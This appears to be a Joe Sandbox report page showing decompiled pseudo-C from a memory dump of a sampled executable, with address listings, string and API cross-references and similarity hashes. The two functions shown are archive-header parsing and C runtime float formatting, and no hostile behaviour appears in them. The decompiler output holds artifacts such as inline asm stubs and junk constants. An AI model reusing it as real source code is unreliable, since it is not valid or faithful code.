									_t519 = (_t120 & 0xffffdcb0) + 0x45d0 + _t395;
									 *(_t547 + 0x2c) = _t519;
									E00E6AE22(_t519, 0);
									_t438 = 5;
									memcpy(_t519, _t395 + 0x21e4, _t438 << 2);
									_t541 =  *(_t547 + 0x2c);
									 *(_t547 + 0x60) =  *(_t395 + 0x21e8);
									 *(_t541 + 0x1058) =  *(_t547 + 0x64);
									 *((char*)(_t541 + 0x10f9)) = 1;
									 *(_t541 + 0x105c) =  *(_t547 + 0x5c);
									 *(_t541 + 0x1094) = E00E6C8E4(_t502);
									 *(_t541 + 0x1060) = E00E6C8E4(_t502);
									_t289 =  *(_t541 + 0x1094) >> 0x00000003 & 0x00000001;
									__eflags = _t289;
									 *(_t541 + 0x1064) = _t502;
									 *(_t541 + 0x109a) = _t289;
									if(_t289 != 0) {
										 *(_t541 + 0x1060) = 0x7fffffff;
										 *(_t541 + 0x1064) = 0x7fffffff;
									}
									_t442 =  *(_t541 + 0x105c);
									_t522 =  *(_t541 + 0x1064);
									_t290 =  *(_t541 + 0x1058);
									_t504 =  *(_t541 + 0x1060);
									__eflags = _t442 - _t522;
									if(__eflags < 0) {
										L51:
										_t290 = _t504;
										_t442 = _t522;
										goto L52;
									} else {
										if(__eflags > 0) {
											L52:
											 *(_t541 + 0x106c) = _t442;
											 *(_t541 + 0x1068) = _t290;
											_t291 = E00E6C8E4(_t504);
											__eflags =  *(_t541 + 0x1094) & 0x00000002;
											 *((intOrPtr*)(_t541 + 0x24)) = _t291;
											if(( *(_t541 + 0x1094) & 0x00000002) != 0) {
												E00E7108D(_t541 + 0x1040, _t504, E00E6C7E4(_t547 + 0x30), 0);
											}
											 *(_t541 + 0x1070) =  *(_t541 + 0x1070) & 0x00000000;
											__eflags =  *(_t541 + 0x1094) & 0x00000004;
											if(( *(_t541 + 0x1094) & 0x00000004) != 0) {
												 *(_t541 + 0x1070) = 2;
												 *((intOrPtr*)(_t541 + 0x1074)) = E00E6C7E4(_t547 + 0x30);
											}
											 *(_t541 + 0x1100) =  *(_t541 + 0x1100) & 0x00000000;
											_t292 = E00E6C8E4(_t504);
											 *(_t547 + 0x64) = _t292;
											 *(_t541 + 0x20) = _t292 >> 0x00000007 & 0x00000007;
											_t450 = (_t292 & 0x0000003f) + 0x32;
											 *((intOrPtr*)(_t541 + 0x1c)) = _t450;
											__eflags = _t450 - 0x32;
											if(_t450 != 0x32) {
												 *((intOrPtr*)(_t541 + 0x1c)) = 0x270f;
											}
											 *((char*)(_t541 + 0x18)) = E00E6C8E4(_t504);
											_t523 = E00E6C8E4(_t504);
											 *(_t541 + 0x10fc) = 2;
											_t295 =  *((intOrPtr*)(_t541 + 0x18));
											 *(_t541 + 0x10f8) =  *(_t395 + 0x21ec) >> 0x00000006 & 1;
											__eflags = _t295 - 1;
											if(_t295 != 1) {
												__eflags = _t295;
												if(_t295 == 0) {
													_t177 = _t541 + 0x10fc;
													 *_t177 =  *(_t541 + 0x10fc) & 0x00000000;
													__eflags =  *_t177;
												}
											} else {
												 *(_t541 + 0x10fc) = 1;
											}
											_t456 =  *(_t541 + 8);
											 *(_t541 + 0x1098) = _t456 >> 0x00000003 & 1;
											 *(_t541 + 0x10fa) = _t456 >> 0x00000005 & 1;
											__eflags =  *(_t547 + 0x60) - 2;
											_t459 =  *(_t547 + 0x64);
											 *(_t541 + 0x1099) = _t456 >> 0x00000004 & 1;
											if( *(_t547 + 0x60) != 2) {
												L65:
												_t302 = 0;
												__eflags = 0;
												goto L66;
											} else {
												__eflags = _t459 & 0x00000040;
												if((_t459 & 0x00000040) == 0) {
													goto L65;
												}
												_t302 = 1;
												L66:
												 *((char*)(_t541 + 0x10f0)) = _t302;
												_t304 =  *(_t541 + 0x1094) & 1;
												 *(_t541 + 0x10f1) = _t304;
												asm("sbb eax, eax");
												 *(_t541 + 0x10f4) =  !( ~(_t304 & 0x000000ff)) & 0x00020000 << (_t459 >> 0x0000000a & 0x0000000f);
												asm("sbb eax, eax");
												 *(_t541 + 0x109c) =  ~( *(_t541 + 0x109b) & 0x000000ff) & 0x00000005;
												__eflags = _t523 - 0x1fff;
												if(_t523 >= 0x1fff) {
													_t523 = 0x1fff;
												}
												E00E6C846(_t547 + 0x30, _t547 - 0x2074, _t523);
												 *((char*)(_t547 + _t523 - 0x2074)) = 0;
												_push(0x800);
												_t524 = _t541 + 0x28;
												_push(_t541 + 0x28);
												_push(_t547 - 0x2074);
												E00E71748();
												_t463 =  *(_t547 + 0x58);
												__eflags = _t463 |  *(_t547 + 0x54);
												if((_t463 |  *(_t547 + 0x54)) != 0) {
													E00E620E7(_t395, _t547 + 0x30, _t463, _t541);
												}
												_t319 =  *(_t547 + 0x60);
												__eflags =  *(_t547 + 0x60) - 2;
												if( *(_t547 + 0x60) != 2) {
													L72:
													_t320 = E00E838B9(_t319, _t524, L"CMT");
													__eflags = _t320;
													if(_t320 == 0) {
														 *((char*)(_t395 + 0x6cb6)) = 1;
													}
													goto L74;
												} else {
													E00E62018(_t395, _t541);
													_t319 =  *(_t547 + 0x60);
													__eflags =  *(_t547 + 0x60) - 2;
													if( *(_t547 + 0x60) == 2) {
														L74:
														__eflags =  *(_t547 + 0x6b);
														if(__eflags != 0) {
															E00E66D72(__eflags, 0x1c, _t395 + 0x24, _t524);
														}
														goto L84;
													}
													goto L72;
												}
											}
										}
										__eflags = _t290 - _t504;
										if(_t290 > _t504) {
											goto L52;
										}
										goto L51;
									}
								}
								__eflags = _t502 - 4;
								if(_t502 == 4) {
									_t471 = 5;
									memcpy(_t395 + 0x2248, _t395 + 0x21e4, _t471 << 2);
									_t331 = E00E6C8E4(_t502);
									__eflags = _t331;
									if(_t331 == 0) {
										 *(_t395 + 0x225c) = E00E6C8E4(_t502) & 0x00000001;
										_t335 = E00E6C797(_t547 + 0x30) & 0x000000ff;
										 *(_t395 + 0x2260) = _t335;
										__eflags = _t335 - 0x18;
										if(_t335 <= 0x18) {
											E00E6C846(_t547 + 0x30, _t395 + 0x2264, 0x10);
											__eflags =  *(_t395 + 0x225c);
											if( *(_t395 + 0x225c) != 0) {
												E00E6C846(_t547 + 0x30, _t395 + 0x2274, 8);
												E00E6C846(_t547 + 0x30, _t547 + 0x64, 4);
												E00E6FBA2(_t547 - 0x74);
												E00E6FBE8(_t547 - 0x74, _t395 + 0x2274, 8);
												_push(_t547 + 8);
												E00E6FAB1(_t547 - 0x74);
												_t350 = E00E8009A(_t547 + 0x64, _t547 + 8, 4);
												asm("sbb al, al");
												_t352 =  ~_t350 + 1;
												__eflags = _t352;
												 *(_t395 + 0x225c) = _t352;
											}
											 *((char*)(_t395 + 0x6cbc)) = 1;
											goto L84;
										}
										_push(_t335);
										_push(L"hc%u");
										L40:
										_push(0x14);
										_push(_t547);
										E00E63F8F();
										E00E63F3A(_t395, _t395 + 0x24, _t547);
										goto L86;
									}
									_push(_t331);
									_push(L"h%u");
									goto L40;
								}
								__eflags = _t502 - 5;
								if(_t502 == 5) {
									_t480 = _t502;
									memcpy(_t395 + 0x4590, _t395 + 0x21e4, _t480 << 2);
									 *(_t395 + 0x45ac) = E00E6C8E4(_t502) & 0x00000001;
									 *((short*)(_t395 + 0x45ae)) = 0;
									 *((char*)(_t395 + 0x45ad)) = 0;
								}
								goto L84;
							}
							_t485 = E00E6C8E4(_t500);
							 *(_t547 + 0x54) = _t500;
							_t256 = 0;
							 *(_t547 + 0x58) = _t485;
							__eflags = _t500;
							if(__eflags < 0) {
								goto L30;
							}
							if(__eflags > 0) {
								goto L85;
							}
							__eflags = _t485 -  *(_t395 + 0x21f0);
							if(_t485 >=  *(_t395 + 0x21f0)) {
								goto L85;
							}
							goto L30;
						}
						E00E61FD3(_t395);
						 *((char*)(_t395 + 0x6cc4)) = 1;
						E00E66FBA(0xea0f50, 3);
						__eflags =  *((char*)(_t547 + 0x6a));
						if(__eflags == 0) {
							goto L26;
						} else {
							E00E66D72(__eflags, 4, _t395 + 0x24, _t395 + 0x24);
							 *((char*)(_t395 + 0x6cc5)) = 1;
							goto L86;
						}
					}
					L17:
					E00E63EF9(_t395, _t500);
					goto L86;
				}
				_t500 =  *((intOrPtr*)(_t395 + 0x6cc0)) + 8;
				asm("adc eax, ecx");
				_t559 =  *((intOrPtr*)(_t395 + 0x6ca4));
				if(_t559 < 0 || _t559 <= 0 &&  *((intOrPtr*)(_t395 + 0x6ca0)) <= _t500) {
					goto L15;
				} else {
					 *((char*)(_t547 + 0x6a)) = 1;
					 *0xe93260(_t547 + 0x18, 0x10);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t395 + 0xc))))() != 0x10) {
						goto L17;
					}
					if( *((char*)( *((intOrPtr*)(_t395 + 0x21bc)) + 0x5124)) != 0) {
						L7:
						 *(_t547 + 0x6b) = 1;
						L8:
						E00E63D65(_t395);
						_t531 = _t395 + 0x2264;
						_t546 = _t395 + 0x1028;
						E00E661C9(_t546, 0, 5,  *((intOrPtr*)(_t395 + 0x21bc)) + 0x5024, _t395 + 0x2264, _t547 + 0x18,  *(_t395 + 0x2260), 0, _t547 + 0x28);
						if( *(_t395 + 0x225c) == 0) {
							L13:
							 *((intOrPtr*)(_t547 + 0x50)) = _t546;
							goto L16;
						} else {
							_t379 = _t395 + 0x2274;
							while(1) {
								_t381 = E00E8009A(_t547 + 0x28, _t379, 8);
								_t549 = _t549 + 0xc;
								if(_t381 == 0) {
									goto L13;
								}
								_t566 =  *(_t547 + 0x6b);
								_t382 = _t395 + 0x24;
								_push(_t382);
								_push(_t382);
								if( *(_t547 + 0x6b) != 0) {
									_push(6);
									E00E66D72(__eflags);
									 *((char*)(_t395 + 0x6cc5)) = 1;
									E00E66FBA(0xea0f50, 0xb);
									goto L86;
								}
								_push(0x80);
								E00E66D72(_t566);
								E00E6EE02( *((intOrPtr*)(_t395 + 0x21bc)) + 0x5024);
								E00E63D65(_t395);
								E00E661C9(_t546, 0, 5,  *((intOrPtr*)(_t395 + 0x21bc)) + 0x5024, _t531, _t547 + 0x18,  *(_t395 + 0x2260), 0, _t547 + 0x28);
								_t379 = _t395 + 0x2274;
								if( *(_t395 + 0x225c) != 0) {
									continue;
								}
								goto L13;
							}
							goto L13;
						}
					}
					_t393 = E00E7166E();
					 *(_t547 + 0x6b) = 0;
					if(_t393 == 0) {
						goto L8;
					}
					goto L7;
				}
			}

0x00e63206
0x00e63207
0x00e6320f
0x00e63219
0x00e63220
0x00e63227
0x00e6322e
0x00e63231
0x00e6323a
0x00e63390
0x00e63390
0x00e63393
0x00e63393
0x00e633a0
0x00e633b1
0x00e633b8
0x00e633c8
0x00e633d2
0x00e633d4
0x00e633db
0x00e633dd
0x00e63a0d
0x00e63a0f
0x00e63a14
0x00e63a17
0x00e63a25
0x00e63a30
0x00e63a30
0x00e633e3
0x00e633e5
0x00000000
0x00000000
0x00e633eb
0x00e633f1
0x00e633f3
0x00e633f3
0x00e633f5
0x00e633f8
0x00000000
0x00000000
0x00e633fe
0x00e63401
0x00000000
0x00000000
0x00e63407
0x00e6340b
0x00e63410
0x00e63413
0x00000000
0x00000000
0x00e63418
0x00e6342a
0x00e63430
0x00e63435
0x00e63440
0x00e63442
0x00e6344b
0x00e63451
0x00e63457
0x00e6345d
0x00e63460
0x00e63463
0x00e63465
0x00e6349f
0x00e6349f
0x00e634a1
0x00e634a8
0x00e634ab
0x00e634ae
0x00e634d8
0x00e634d8
0x00e634df
0x00e634e1
0x00e634e4
0x00e634e7
0x00e634ec
0x00e634f1
0x00e634f3
0x00e634f6
0x00e634f6
0x00e63501
0x00e6350e
0x00e6351d
0x00e63526
0x00e6352e
0x00e63535
0x00e6353b
0x00e6353d
0x00e6394e
0x00e6395d
0x00e6395e
0x00e63968
0x00e63971
0x00e6397e
0x00e6398d
0x00e63998
0x00e6399b
0x00e639a1
0x00e639a7
0x00e639a9
0x00e639af
0x00e639b2
0x00e639c9
0x00e639b4
0x00e639bc
0x00e639c4
0x00e639c6
0x00e639c6
0x00e639cf
0x00e639d6
0x00e639e0
0x00e639e0
0x00000000
0x00e639d8
0x00e639d8
0x00e639de
0x00e639e2
0x00e639e2
0x00e639e8
0x00e639ed
0x00e639f0
0x00e63a00
0x00e63a00
0x00e63a05
0x00e63a08
0x00000000
0x00e63a08
0x00000000
0x00e639de
0x00e639d6
0x00e63543
0x00000000
0x00000000
0x00e63549
0x00e6354c
0x00e6368e
0x00e63696
0x00e636a5
0x00e636a9
0x00e636ac
0x00e636b3
0x00e636ba
0x00e636c5
0x00e636c8
0x00e636ce
0x00e636d7
0x00e636de
0x00e636ec
0x00e636f7
0x00e63706
0x00e63706
0x00e63708
0x00e6370e
0x00e63714
0x00e6371b
0x00e63721
0x00e63721
0x00e63727
0x00e6372d
0x00e63733
0x00e63739
0x00e6373f
0x00e63741
0x00e63749
0x00e63749
0x00e6374b
0x00000000
0x00e63743
0x00e63743
0x00e6374d
0x00e6374d
0x00e63756
0x00e6375c
0x00e63761
0x00e63768
0x00e6376b
0x00e6377e
0x00e6377e
0x00e63783
0x00e6378a
0x00e63791
0x00e63796
0x00e637a5
0x00e637a5
0x00e637ab
0x00e637b5
0x00e637bc
0x00e637c5
0x00e637cd
0x00e637d0
0x00e637d3
0x00e637d6
0x00e637d8
0x00e637d8
0x00e637ea
0x00e637fe
0x00e63800
0x00e6380a
0x00e6380f
0x00e63815
0x00e63817
0x00e63821
0x00e63823
0x00e63825
0x00e63825
0x00e63825
0x00e63825
0x00e63819
0x00e63819
0x00e63819
0x00e6382c
0x00e63836
0x00e63848
0x00e6384e
0x00e63852
0x00e63855
0x00e6385b
0x00e63866
0x00e63866
0x00e63866
0x00000000
0x00e6385d
0x00e6385d
0x00e63860
0x00000000
0x00000000
0x00e63862
0x00e63868
0x00e63868
0x00e63874
0x00e63879
0x00e6388e
0x00e63894
0x00e638a3
0x00e638a8
0x00e638b3
0x00e638b5
0x00e638b7
0x00e638b7
0x00e638c4
0x00e638c9
0x00e638d7
0x00e638dc
0x00e638df
0x00e638e0
0x00e638e1
0x00e638e6
0x00e638eb
0x00e638ee
0x00e638f8
0x00e638f8
0x00e638fd
0x00e63900
0x00e63903
0x00e63915
0x00e6391b
0x00e63922
0x00e63924
0x00e63926
0x00e63926
0x00000000
0x00e63905
0x00e63908
0x00e6390d
0x00e63910
0x00e63913
0x00e6392d
0x00e6392d
0x00e63931
0x00e6393e
0x00e6393e
0x00000000
0x00e63931
0x00000000
0x00e63913
0x00e63903
0x00e6385b
0x00e63745
0x00e63747
0x00000000
0x00000000
0x00000000
0x00e63747
0x00e63741
0x00e63552
0x00e63555
0x00e63596
0x00e635a3
0x00e635a8
0x00e635ad
0x00e635af
0x00e635e6
0x00e635f1
0x00e635f4
0x00e635fa
0x00e635fd
0x00e63613
0x00e63618
0x00e6361f
0x00e6362d
0x00e6363b
0x00e63644
0x00e63650
0x00e63658
0x00e6365d
0x00e6366c
0x00e63676
0x00e63678
0x00e63678
0x00e6367a
0x00e6367a
0x00e63680
0x00000000
0x00e63680
0x00e635ff
0x00e63600
0x00e635b7
0x00e635ba
0x00e635bc
0x00e635bd
0x00e635cf
0x00000000
0x00e635cf
0x00e635b1
0x00e635b2
0x00000000
0x00e635b2
0x00e63557
0x00e6355a
0x00e63561
0x00e6356e
0x00e6357a
0x00e63582
0x00e63589
0x00e63589
0x00000000
0x00e6355a
0x00e634b8
0x00e634ba
0x00e634bd
0x00e634bf
0x00e634c2
0x00e634c4
0x00000000
0x00000000
0x00e634c6
0x00000000
0x00000000
0x00e634cc
0x00e634d2
0x00000000
0x00000000
0x00000000
0x00e634d2
0x00e63469
0x00e63475
0x00e6347c
0x00e63481
0x00e63485
0x00000000
0x00e63487
0x00e6348e
0x00e63493
0x00000000
0x00e63493
0x00e63485
0x00e633a2
0x00e633a4
0x00000000
0x00e633a4
0x00e63248
0x00e6324b
0x00e6324d
0x00e63253
0x00000000
0x00e63267
0x00e6326f
0x00e63278
0x00e63285
0x00000000
0x00000000
0x00e63298
0x00e632a7
0x00e632a7
0x00e632ab
0x00e632ad
0x00e632c9
0x00e632d5
0x00e632e1
0x00e632ed
0x00e6336c
0x00e6336c
0x00000000
0x00e632ef
0x00e632ef
0x00e632f5
0x00e632fc
0x00e63301
0x00e63306
0x00000000
0x00000000
0x00e63308
0x00e6330c
0x00e6330f
0x00e63310
0x00e63311
0x00e63371
0x00e63373
0x00e6337f
0x00e63386
0x00000000
0x00e63386
0x00e63313
0x00e63318
0x00e63329
0x00e63330
0x00e63358
0x00e63364
0x00e6336a
0x00000000
0x00000000
0x00000000
0x00e6336a
0x00000000
0x00e632f5
0x00e632ed
0x00e6329a
0x00e6329f
0x00e632a5
0x00000000
0x00000000
0x00000000
0x00e632a5

APIs

__EH_prolog.LIBCMT ref: 00E6320F
_memcmp.LIBVCRUNTIME ref: 00E632FC

Strings

CMT, xrefs: 00E63915
h%u, xrefs: 00E635B2
hc%u, xrefs: 00E63600

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: H_prolog_memcmp
String ID: CMT$h%u$hc%u
API String ID: 3004599000-3282847064
Opcode ID: 13265094ba9ed6357cd10d994de97f2d4e4e3fbcab89a20bb879ba782b4e0b1b
Instruction ID: f4fcef1667d0d29e2b6329bf58082f51ce62fdb70d925a070a0bd00428f60a8b
Opcode Fuzzy Hash: 13265094ba9ed6357cd10d994de97f2d4e4e3fbcab89a20bb879ba782b4e0b1b
Instruction Fuzzy Hash: 8E3204715403849FDF18DF74D885AEA37E5AF54344F04147EFD9AAB282DB70AA48CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00E8D35E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 67%

			E00E8D35E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v32;
				signed int _v36;
				char _v460;
				signed int _v464;
				void _v468;
				signed int _v472;
				signed int _v932;
				signed int _v936;
				signed int _v1392;
				signed int _v1396;
				signed int _v1400;
				char _v1860;
				signed int _v1864;
				signed int _v1865;
				signed int _v1872;
				signed int _v1876;
				signed int _v1880;
				signed int _v1884;
				signed int _v1888;
				signed int _v1892;
				signed int _v1896;
				intOrPtr _v1900;
				signed int _v1904;
				signed int _v1908;
				signed int _v1912;
				signed int _v1916;
				signed int _v1920;
				signed int _v1924;
				signed int _v1928;
				char _v1936;
				char _v1944;
				char _v2404;
				signed int _v2408;
				signed int _t743;
				signed int _t753;
				signed int _t754;
				intOrPtr _t763;
				signed int _t764;
				intOrPtr _t767;
				intOrPtr _t770;
				intOrPtr _t772;
				intOrPtr _t773;
				void* _t774;
				signed int _t778;
				signed int _t779;
				signed int _t785;
				signed int _t791;
				intOrPtr _t793;
				void* _t794;
				signed int _t795;
				signed int _t796;
				signed int _t797;
				signed int _t806;
				signed int _t811;
				signed int _t812;
				signed int _t813;
				signed int _t816;
				signed int _t817;
				signed int _t818;
				signed int _t820;
				signed int _t821;
				signed int _t822;
				signed int _t823;
				signed int _t828;
				signed int _t829;
				signed int _t835;
				signed int _t836;
				signed int _t839;
				signed int _t844;
				signed int _t852;
				signed int* _t855;
				signed int _t859;
				signed int _t870;
				signed int _t871;
				signed int _t873;
				char* _t874;
				signed int _t877;
				signed int _t881;
				signed int _t882;
				signed int _t887;
				signed int _t889;
				signed int _t894;
				signed int _t903;
				signed int _t906;
				signed int _t908;
				signed int _t911;
				signed int _t912;
				signed int _t913;
				signed int _t916;
				signed int _t929;
				signed int _t930;
				signed int _t932;
				char* _t933;
				signed int _t936;
				signed int _t940;
				signed int _t941;
				signed int* _t943;
				signed int _t946;
				signed int _t948;
				signed int _t953;
				signed int _t961;
				signed int _t964;
				signed int _t968;
				signed int* _t975;
				intOrPtr _t977;
				void* _t978;
				intOrPtr* _t980;
				signed int* _t984;
				unsigned int _t995;
				signed int _t996;
				void* _t999;
				signed int _t1000;
				void* _t1002;
				signed int _t1003;
				signed int _t1004;
				signed int _t1005;
				signed int _t1015;
				signed int _t1020;
				signed int _t1023;
				unsigned int _t1026;
				signed int _t1027;
				void* _t1030;
				signed int _t1031;
				void* _t1033;
				signed int _t1034;
				signed int _t1035;
				signed int _t1036;
				signed int _t1041;
				signed int* _t1046;
				signed int _t1048;
				signed int _t1058;
				void _t1061;
				signed int _t1064;
				void* _t1067;
				void* _t1074;
				signed int _t1080;
				signed int _t1081;
				signed int _t1084;
				signed int _t1085;
				signed int _t1087;
				signed int _t1088;
				signed int _t1089;
				signed int _t1093;
				signed int _t1097;
				signed int _t1098;
				signed int _t1099;
				signed int _t1101;
				signed int _t1102;
				signed int _t1103;
				signed int _t1104;
				signed int _t1105;
				signed int _t1106;
				signed int _t1108;
				signed int _t1109;
				signed int _t1110;
				signed int _t1111;
				signed int _t1112;
				signed int _t1113;
				unsigned int _t1114;
				void* _t1117;
				intOrPtr _t1119;
				signed int _t1120;
				signed int _t1121;
				signed int _t1122;
				signed int* _t1126;
				void* _t1130;
				void* _t1131;
				signed int _t1132;
				signed int _t1133;
				signed int _t1134;
				signed int _t1137;
				signed int _t1138;
				signed int _t1143;
				void* _t1145;
				signed int _t1146;
				signed int _t1149;
				char _t1154;
				signed int _t1156;
				signed int _t1157;
				signed int _t1158;
				signed int _t1159;
				signed int _t1160;
				signed int _t1161;
				signed int _t1162;
				signed int _t1166;
				signed int _t1167;
				signed int _t1168;
				signed int _t1169;
				signed int _t1170;
				unsigned int _t1173;
				void* _t1177;
				void* _t1178;
				unsigned int _t1179;
				signed int _t1184;
				signed int _t1185;
				signed int _t1187;
				signed int _t1188;
				intOrPtr* _t1190;
				signed int _t1191;
				signed int _t1193;
				signed int _t1194;
				signed int _t1197;
				signed int _t1199;
				signed int _t1200;
				void* _t1201;
				signed int _t1202;
				signed int _t1203;
				signed int _t1204;
				void* _t1207;
				signed int _t1208;
				signed int _t1209;
				signed int _t1210;
				signed int _t1211;
				signed int _t1212;
				signed int* _t1215;
				signed int _t1216;
				signed int _t1217;
				signed int _t1218;
				signed int _t1219;
				intOrPtr* _t1221;
				intOrPtr* _t1222;
				signed int _t1224;
				signed int _t1226;
				signed int _t1229;
				signed int _t1235;
				signed int _t1239;
				signed int _t1240;
				signed int _t1245;
				signed int _t1248;
				signed int _t1249;
				signed int _t1250;
				signed int _t1251;
				signed int _t1252;
				signed int _t1253;
				signed int _t1255;
				signed int _t1256;
				signed int _t1257;
				signed int _t1258;
				signed int _t1260;
				signed int _t1261;
				signed int _t1262;
				signed int _t1263;
				signed int _t1264;
				signed int _t1266;
				signed int _t1267;
				signed int _t1269;
				signed int _t1271;
				signed int _t1273;
				signed int _t1276;
				signed int _t1278;
				signed int* _t1279;
				signed int* _t1282;
				signed int _t1291;

				_t1145 = __edx;
				_t1276 = _t1278;
				_t1279 = _t1278 - 0x964;
				_t743 =  *0xe9e668; // 0x8ae5c3d8
				_v8 = _t743 ^ _t1276;
				_t1058 = _a20;
				_push(__esi);
				_push(__edi);
				_t1190 = _a16;
				_v1924 = _t1190;
				_v1920 = _t1058;
				E00E8CE86( &_v1944, __eflags);
				_t1239 = _a8;
				_t748 = 0x2d;
				if((_t1239 & 0x80000000) == 0) {
					_t748 = 0x120;
				}
				 *_t1190 = _t748;
				 *((intOrPtr*)(_t1190 + 8)) = _t1058;
				_t1191 = _a4;
				if((_t1239 & 0x7ff00000) != 0) {
					L5:
					_t753 = E00E89464( &_a4);
					_pop(_t1073);
					__eflags = _t753;
					if(_t753 != 0) {
						_t1073 = _v1924;
						 *((intOrPtr*)(_v1924 + 4)) = 1;
					}
					_t754 = _t753 - 1;
					__eflags = _t754;
					if(_t754 == 0) {
						_push("1#INF");
						goto L308;
					} else {
						_t778 = _t754 - 1;
						__eflags = _t778;
						if(_t778 == 0) {
							_push("1#QNAN");
							goto L308;
						} else {
							_t779 = _t778 - 1;
							__eflags = _t779;
							if(_t779 == 0) {
								_push("1#SNAN");
								goto L308;
							} else {
								__eflags = _t779 == 1;
								if(_t779 == 1) {
									_push("1#IND");
									goto L308;
								} else {
									_v1928 = _v1928 & 0x00000000;
									_a4 = _t1191;
									_a8 = _t1239 & 0x7fffffff;
									_t1291 = _a4;
									asm("fst qword [ebp-0x768]");
									_t1193 = _v1896;
									_v1916 = _a12 + 1;
									_t1080 = _t1193 >> 0x14;
									_t785 = _t1080 & 0x000007ff;
									__eflags = _t785;
									if(_t785 != 0) {
										_t1146 = 0;
										_t785 = 0;
										__eflags = 0;
									} else {
										_t1146 = 1;
									}
									_t1194 = _t1193 & 0x000fffff;
									_t1061 = _v1900 + _t785;
									asm("adc edi, esi");
									__eflags = _t1146;
									_t1081 = _t1080 & 0x000007ff;
									_t1245 = _t1081 - 0x434 + (0 | _t1146 != 0x00000000) + 1;
									_v1872 = _t1245;
									E00E8EED0(_t1081, _t1291);
									_push(_t1081);
									_push(_t1081);
									 *_t1279 = _t1291;
									_t791 = E00E91D30(E00E8EFE0(_t1194, _t1245), _t1291);
									_v1904 = _t791;
									__eflags = _t791 - 0x7fffffff;
									if(_t791 == 0x7fffffff) {
										L16:
										__eflags = 0;
										_v1904 = 0;
									} else {
										__eflags = _t791 - 0x80000000;
										if(_t791 == 0x80000000) {
											goto L16;
										}
									}
									_v468 = _t1061;
									__eflags = _t1194;
									_v464 = _t1194;
									_t1064 = (0 | _t1194 != 0x00000000) + 1;
									_v472 = _t1064;
									__eflags = _t1245;
									if(_t1245 < 0) {
										__eflags = _t1245 - 0xfffffc02;
										if(_t1245 == 0xfffffc02) {
											L101:
											_t793 =  *((intOrPtr*)(_t1276 + _t1064 * 4 - 0x1d4));
											_t195 =  &_v1896;
											 *_t195 = _v1896 & 0x00000000;
											__eflags =  *_t195;
											asm("bsr eax, eax");
											if( *_t195 == 0) {
												_t1084 = 0;
												__eflags = 0;
											} else {
												_t1084 = _t793 + 1;
											}
											_t794 = 0x20;
											_t795 = _t794 - _t1084;
											__eflags = _t795 - 1;
											_t796 = _t795 & 0xffffff00 | _t795 - 0x00000001 > 0x00000000;
											__eflags = _t1064 - 0x73;
											_v1865 = _t796;
											_t1085 = _t1084 & 0xffffff00 | _t1064 - 0x00000073 > 0x00000000;
											__eflags = _t1064 - 0x73;
											if(_t1064 != 0x73) {
												L107:
												_t797 = 0;
												__eflags = 0;
											} else {
												__eflags = _t796;
												if(_t796 == 0) {
													goto L107;
												} else {
													_t797 = 1;
												}
											}
											__eflags = _t1085;
											if(_t1085 != 0) {
												L126:
												_v1400 = _v1400 & 0x00000000;
												_t224 =  &_v472;
												 *_t224 = _v472 & 0x00000000;
												__eflags =  *_t224;
												E00E8B851( &_v468, 0x1cc,  &_v1396, 0);
												_t1279 =  &(_t1279[4]);
											} else {
												__eflags = _t797;
												if(_t797 != 0) {
													goto L126;
												} else {
													_t1112 = 0x72;
													__eflags = _t1064 - _t1112;
													if(_t1064 < _t1112) {
														_t1112 = _t1064;
													}
													__eflags = _t1112 - 0xffffffff;
													if(_t1112 != 0xffffffff) {
														_t1263 = _t1112;
														_t1221 =  &_v468 + _t1112 * 4;
														_v1880 = _t1221;
														while(1) {
															__eflags = _t1263 - _t1064;
															if(_t1263 >= _t1064) {
																_t208 =  &_v1876;
																 *_t208 = _v1876 & 0x00000000;
																__eflags =  *_t208;
															} else {
																_v1876 =  *_t1221;
															}
															_t210 = _t1263 - 1; // 0x70
															__eflags = _t210 - _t1064;
															if(_t210 >= _t1064) {
																_t1173 = 0;
																__eflags = 0;
															} else {
																_t1173 =  *(_t1221 - 4);
															}
															_t1221 = _t1221 - 4;
															_t975 = _v1880;
															_t1263 = _t1263 - 1;
															 *_t975 = _t1173 >> 0x0000001f ^ _v1876 + _v1876;
															_v1880 = _t975 - 4;
															__eflags = _t1263 - 0xffffffff;
															if(_t1263 == 0xffffffff) {
																break;
															}
															_t1064 = _v472;
														}
														_t1245 = _v1872;
													}
													__eflags = _v1865;
													if(_v1865 == 0) {
														_v472 = _t1112;
													} else {
														_t218 = _t1112 + 1; // 0x73
														_v472 = _t218;
													}
												}
											}
											_t1197 = 1 - _t1245;
											E00E7F5F0(_t1197,  &_v1396, 0, 1);
											__eflags = 1;
											 *(_t1276 + 0xbad63d) = 1 << (_t1197 & 0x0000001f);
											_t806 = 0xbadbae;
										} else {
											_v1396 = _v1396 & 0x00000000;
											_t1113 = 2;
											_v1392 = 0x100000;
											_v1400 = _t1113;
											__eflags = _t1064 - _t1113;
											if(_t1064 == _t1113) {
												_t1177 = 0;
												__eflags = 0;
												while(1) {
													_t977 =  *((intOrPtr*)(_t1276 + _t1177 - 0x570));
													__eflags = _t977 -  *((intOrPtr*)(_t1276 + _t1177 - 0x1d0));
													if(_t977 !=  *((intOrPtr*)(_t1276 + _t1177 - 0x1d0))) {
														goto L101;
													}
													_t1177 = _t1177 + 4;
													__eflags = _t1177 - 8;
													if(_t1177 != 8) {
														continue;
													} else {
